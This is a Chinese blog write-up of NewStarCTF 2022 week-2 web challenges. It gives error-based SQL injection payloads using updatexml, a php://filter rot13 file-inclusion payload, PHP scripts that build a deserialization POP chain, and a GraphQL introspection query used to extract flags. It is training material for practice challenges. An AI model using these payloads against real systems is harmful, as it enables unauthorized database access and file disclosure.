newstarctf2022week2

最新推荐文章于 2024-06-17 12:51:48 发布
最新推荐文章于 2024-06-17 12:51:48 发布
阅读量525 收藏
点赞数
分类专栏: nssctf 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kuzemax/article/details/134161667
版权

 Word-For-You(2 Gen)

 和week1 的界面一样不过当时我写题的时候出了个小插曲

连接 MySQL 失败: Access denied for user 'root'@'localhost'

这句话印在了背景,后来再进就没了,我猜测是报错注入

想办法传参 可以看到一个name=2,试着传参

发现有回显三个字段

爆库

~wfy~

尝试爆表

 

这是第一个

 

wfy_admin 
wfy_comments
wfy_information

查看admin

1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='wfy_admin' limit 0,1),0x7e),3)--+

记录一下所有列名:id,username、password、cookie  

 没有回显看下一个内容

记录一下列名:id、text、user、name、display,一共五个列

?name=-1' and updatexml(1,concat(0x7e,(select id from wfy_comments limit 0,1),0x7e),1)--+

有回显

多输入几位看看有多少行数据,测试了一下,有12列,可以更换列名,挨个尝试 

按照经验多半在text里

为了节约工作量这里可以用burp试,

 

 发现flag:flag{Ju4t_m2ke_some_err0rs}

IncludeOne

 很显然Hint需要用给的工具解开

去搜了一下这个工具要在虚拟机上用

最后结果是1202031004

第二个if是判断传入的file参数过滤base以及目录穿越
而且必须含有Newstar,最后需要包含flag.php
看起来是伪协议套一层协议
因为base被过滤了所以这里用rot13

payload=php://filter/read=string.rot13/newstar/resource=flag.php 

 

flag{6e648778-bb69-49b9-9447-2b83433c4f74} 

UnserializeOne

<?php
error_reporting(0);
highlight_file(__FILE__);
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274
class Start{
    public $name;
    protected $func;

    public function __destruct()
    {
        echo "Welcome to NewStarCTF, ".$this->name;
    }

    public function __isset($var)
    {
        ($this->func)();
    }
}

class Sec{
    private $obj;
    private $var;

    public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

    public function __invoke()
    {
        echo file_get_contents('/flag');
    }
}

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

class eeee{
    public $obj;

    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }
}

if(isset($_POST['pop'])){
    unserialize($_POST['pop']);
}

很明显是一道php反序列化的题,捋清pop链的顺序,然后构造pop链

__construct(),类的构造函数

__destruct(),类的析构函数

__call(),在对象中调用一个不可访问方法时调用

__callStatic(),用静态方式中调用一个不可访问方法时调用

__get(),获得一个类的成员变量时调用

__set(),设置一个类的成员变量时调用

__isset(),当对不可访问属性调用isset()或empty()时调用

__unset(),当对不可访问属性调用unset()时被调用。

__sleep(),执行serialize()时,先会调用这个函数

__wakeup(),执行unserialize()时,先会调用这个函数

__toString(),类被当成字符串时的回应方法

__invoke(),调用函数的方式调用一个对象时的回应方法

__set_state(),调用var_export()导出类时,此静态方法会被调用。

__clone(),当对象复制完成时调用

__autoload(),尝试加载未定义的类

__debugInfo(),打印所需调试信息

 我们最后要利用这个函数,echo file_get_contents('/flag');所以__invoke()在最后使用,往上继续推public function __isset($var)
    {
        ($this->func)();

这个调用__invoke(),继续一直往上推这样一个pop链就能写出来,这个函数调用    public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
然后pop链顺序为class Start(public function __destruct())--->class Sec(__toString())--->
class Easy(public function __call($fun, $var))--->class eeee(__clone())--->class Start(__isset($var))--->class Sec(__invoke())

值得注意的是,这有protected,需要从类内部操作,不能从外面赋。改成public

<?php
class Start{
    public $name;
    public $func;
}

class Sec{
    public $obj;
    public $var;
}

class Easy{
    public $cla;
}

class eeee{
    public $obj;
}

$pop=new Start();
$pop->name=new Sec();
$pop->name->obj=new Easy();
$pop->name->var=new eeee();
$pop->name->var->obj=new Start();
$pop->name->var->obj->func=new Sec();

echo urlencode(serialize($pop));

这里我有点不清楚 

$pop->name->var=new eeee();

为啥var到eeee,一开始我个人觉得是这么整var->new Easy()->new eeee()我这里是试出来的因为原来构造出来的行不通,后来问了问学长说看var那个类里就行,obj-check(var),obj给那个有call的类,那个没有check方法,调call,call里有clone函数,clone var之后会调var的__clone

 得出结果

 我的火狐可能有点问题,一开始试了几次没出结果,然后重新打开网址可以了

这里还有一种构造思路

<?php 
class Start{
    public $name;
    public $func;
}
 
class Sec{
    public $obj;
    public $var;
}
 
class Easy{
    public $cla;
}
 
class eeee{
    public $obj;
}
$start = new Start();
$sec = new Sec();
$easy = new Easy();
$eeee = new eeee();
$eeee->obj = $start;
$sec->obj = $easy;
$sec->var = $eeee;
$start->name = $sec;
$start->func = $sec;
echo serialize($start);
 ?>

个人偏向前一直思路,可以直观的看出来

ezAPI

API(Application Programming Interface,应用程序接口)是指两个不同软件应用之间进行交互的一组方法。它是现代软件开发中不可或缺的一部分,让不同的应用程序能够相互通信、共享数据,并且以一种有序的方式进行整合。

  1. Web API

Web API是一组基于HTTP协议的RESTful API,它通常由Web服务器提供。此类API包括各种网络服务,如社交媒体、搜索引擎、电子商务等。开发人员可以使用Web API来获取第三方数据或在其他应用程序中共享数据。

Web API具有高度的可扩展性,并且可以通过API文档和API密钥进行访问控制。开发人员可以使用Web API来构建各种应用程序,如智能家居、移动应用程序等。

 

 

这题 一开始没有什么思路1输入1有回显

输入999查不到,并且报错,肯定是一种注入,一开始试了几种都没有用

 查看源代码也没有什么收获,于是试了试robots.txt等

然后www.zip有用,打开文件

<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8" />
    <title>Search Page</title>
    <link rel="stylesheet" type="text/css" href="css/style.css" tppabs="css/style.css" />
    <style>
        body {
            height: 100%;
            background: #16a085;
            overflow: hidden;
        }

        canvas {
            z-index: -1;
            position: absolute;
        }
    </style>
    <script src="js/jquery.js"></script>
    <script src="js/verificationNumbers.js" tppabs="js/verificationNumbers.js"></script>
    <script src="js/Particleground.js" tppabs="js/Particleground.js"></script>
    <script>
        $(document).ready(function() {
            $('body').particleground({
                dotColor: '#5cbdaa',
                lineColor: '#5cbdaa'
            });
        });ß
    </script>
</head>
<!--unremove DEBUG function, please delete it-->
<body>
    <dl class="admin_login">
        <dt>
            <font color="white"><strong>Search Page Beta</strong></font>
        </dt>
        <form action="index.php" method="post">
            <dd class="user_icon">
                <input type="text" name="id" placeholder="用户ID" class="login_txtbx" />
            </dd>
            <dd>
                <input type="submit" value="Search" class="submit_btn" />
            </dd>
        </form><br>
        <center>
            <font size="4px" color="white">
                <?php
                error_reporting(0);
                $id = $_POST['id'];
                function waf($str)
                {
                    if (!is_numeric($str) || preg_replace("/[0-9]/", "", $str) !== "") {
                        return False;
                    } else {
                        return True;
                    }
                }

                function send($data)
                {
                    $options = array(
                        'http' => array(
                            'method' => 'POST',
                            'header' => 'Content-type: application/json',
                            'content' => $data,
                            'timeout' => 10 * 60
                        )
                    );
                    $context = stream_context_create($options);
                    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);
                    return $result;
                }

                if (isset($id)) {
                    if (waf($id)) {
                        isset($_POST['data']) ? $data = $_POST['data'] : $data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}';
                        $res = json_decode(send($data));
                        if ($res->data->users_user_by_pk->name !== NULL) {
                            echo "ID: " . $id . "<br>Name: " . $res->data->users_user_by_pk->name;
                        } else {
                            echo "<b>Can't found it!</b><br><br>DEBUG: ";
                            var_dump($res->data);
                        }
                    } else {
                        die("<b>Hacker! Only Number!</b>");
                    }
                } else {
                    die("<b>No Data?</b>");
                }
                ?>
            </font>
        </center>
    </dl>
</body>

</html>

$data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}'

这个数据没见过,去查了一下

这里是我第一次接触graphql

玩转graphQL (qq.com)这篇文章讲的很详细

GraphQL 是一个用于 API的查询语言,使用基于类型系统来执行查询的服务(类型系统由你的数据定义)。GraphQL 并没有和任何特定数据库或者存储引擎绑定,而是依靠你现有的代码和数据支撑。

如果你了解REST API会更快地了解它。像REST API,往往我们的请求需要多个API,每个API是一个类型。比如:http://www.test.com/users/{id} 这个API可以获取用户的信息;再比如:http://www.test.com/users/list 这个API可以获取所有用户的信息。

"query":"\n    query IntrospectionQuery {\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  ","variables":null}

利用内省查询看到所有接口情况

可以看到flag的文件

模仿一下上面给出的data格式 得到flag

flag{4a902c8e-a8b5-ecfb-bee3-d6419865647c}

丸子丸子鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
week2day2
02-18
week2day2
Algorithm Part2 Week1 Assigment
11-22
Algorithm Part2 Week1 的作业,是关于两个单词相似度的计算,运用图论中广搜的思想解决。代码很详细,看了就知道,而且附有测试用例。
Week2.rar
03-10
Week2.rar
week2.zip
03-09
week2.zip
week2.java
10-11
week2.java
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8289
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全和信息安全
waitaikong_的博客
06-12 633
信息安全网络安全与网络空间安全是当前信息技术领域内的三个重要概念,它们在某些方面有着紧密的联系,同时在不同的语境和应用场景下又有所区别。本次分析旨在深入理解这三个概念的定义、内涵及其相互关系,以便更好地应用于实际工作中。综上所述,信息安全网络安全和网络空间安全是三个密切相关但又各具特色的概念。信息安全关注的是信息本身的保护,网络安全侧重于网络环境和设施的安全,而网络空间安全则是一个更全面的框架,它不仅包括了信息安全网络安全的内容,还延伸到了更广泛的社会和法律层面。
网络安全攻防演练:提升应急响应能力
weixin_64392888的博客
06-14 684
随着网络威胁的不断演变,组织需要持续投入资源和精力,通过攻防演练等手段,构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天,网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中,攻击团队通过发送带有恶意链接的电子邮件,成功绕过了部分员工的警惕。演练结束后,组织加强了员工的网络安全培训,并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法,它通过模拟攻击者的行为,评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程,评估攻击和防御的效果。
国内外网络安全现状分析
waitaikong_的博客
06-10 577
综上所述,无论是国内还是国际层面,网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁,需要政府、企业和个人共同努力,不断提升技术防护能力,加强法律法规建设,并通过国际合作共同应对挑战。同时,加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来,随着技术的不断进步和国际合作的加深,我们有理由相信网络安全状况将会得到进一步的改善。
网络安全:什么是SQL注入
浪里个狼游记
06-17 396
在数字化时代,数据安全成为了企业和个人最关心的问题之一。SQL注入(SQL Injection)是网络安全领域中最常见也是最危险的攻击手段之一。本文将深入探讨SQL注入的概念、工作原理以及它如何成为一个严重的威胁。SQL注入是一种代码注入技术,攻击者通过在Web表单输入或者URL查询字符串中输入恶意SQL代码,利用应用程序后端数据库的安全漏洞,从而执行非法的数据库操作。这些操作可能包括但不限于数据泄露、数据删除、数据篡改和身份冒用。
提升网络安全韧性:从基础防护开始
Dexun_chuqi的博客
06-13 628
网络安全韧性(Cyber Resilience)指的是在面对网络攻击或其他不利事件时,系统、网络和组织能够有效抵御、吸收和恢复正常功能的能力。这一概念不仅关注防止攻击的发生,还强调在攻击发生后,系统能够迅速恢复并继续运行。网络安全韧性包括预防、响应、恢复三个主要环节,旨在确保在面对各种潜在威胁时,网络能够保持其关键功能。提升网络安全韧性是一项系统性工程,涉及多个方面的综合管理和技术手段。
网络安全(补充)
m0_62207482的博客
06-14 968
清除攻击痕迹:避免安全管理员的发现、追踪以及法律部门取证 隐藏技术:连接隐藏(冒充其他用户、修改LOGNAME环境变量、修改utmp日志文件、使用IP SPOOF技术等)、进程隐藏(使用重定向技术减少ps给出的信息量,用特洛伊木马带皮ps程序等)、文件隐藏(利用字符串相似麻痹系统管理员,或修改文件属性使得普通显示方法无法看到、利用操作系统可加载模块特性,隐瞒攻击时所产生的信息) 完全连接扫描利用TCP/IP协议的三次握手连接机制,使源主机和目的主机的某个端口建立一次完整的链接。如果连接成功,则表明该端口
web安全-前端层面
保持学习,时刻复盘
06-11 1476
跨站脚本攻击(Cross-Site Scripting, 简称XSS)当用户将恶意代码注入网页时,其他用户在浏览网页时就会受到影响攻击主要方向主要用于盗取cookie凭据,钓鱼攻击,流量指向等CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。
【网络文明】关注网络安全
Liang_z_的博客
06-12 702
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
咖啡店管理系统 (Java 版) 源代码+使用说明+可做毕设
06-17
咖啡店管理系统 (Java 版) 源代码 项目简介 这个 Java 项目是一个简单的商店管理系统。该系统处理任何咖啡酒店的业务细节。要制作这个项目,你需要 JetBrains IntelliJ IDE。这个 IDE 将为项目提供设置。你还需要 PostgreSQL 作为数据库。设计简单且用户友好。 系统介绍 关于 Java 版咖啡店管理系统,该系统处理酒店用户的管理。在使用系统之前,你需要先注册然后登录系统。从那里你可以管理你的工作空间,你可以添加客户,管理销售并进行更新。 设计非常简单,用户在操作时不会遇到困难。该项目易于操作和理解。要运行此项目,你必须在电脑上安装 Eclipse IDE 或 JetBrains IntelliJ IDE。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
vspdconfig虚拟串口软件
06-17
用于添加虚拟串口,而不用连接硬件,方便调试。
仿真设计zzz.uvproj
最新发布
06-17
asdf.uvproj
强大且美观的WPF UI控件库:HandyControl
06-17
HandyControl是一套WPF控件库,它几乎重写了所有原生样式,同时包含80余款自定义控件。使用HandyControl你可以轻松地创建一个美观的WPF应用程序,从而大大提高开发效率。
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源
06-17
高分项目,基于Unity3D开发实现的打砖块游戏,内含完整源码+资源 一款经典的打砖块游戏,画面清晰玩法简单,运行流畅。游戏包括60个关卡,支持3种不同速度的节奏。《打砖块 高清版 Krakout HD》是一款经典的打砖块游戏,你可以自己玩也可以跟朋友一起玩双人模式,游戏有丰富的背景,大量的关卡,劲爆的音乐。PS:如果出现ERR:...
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值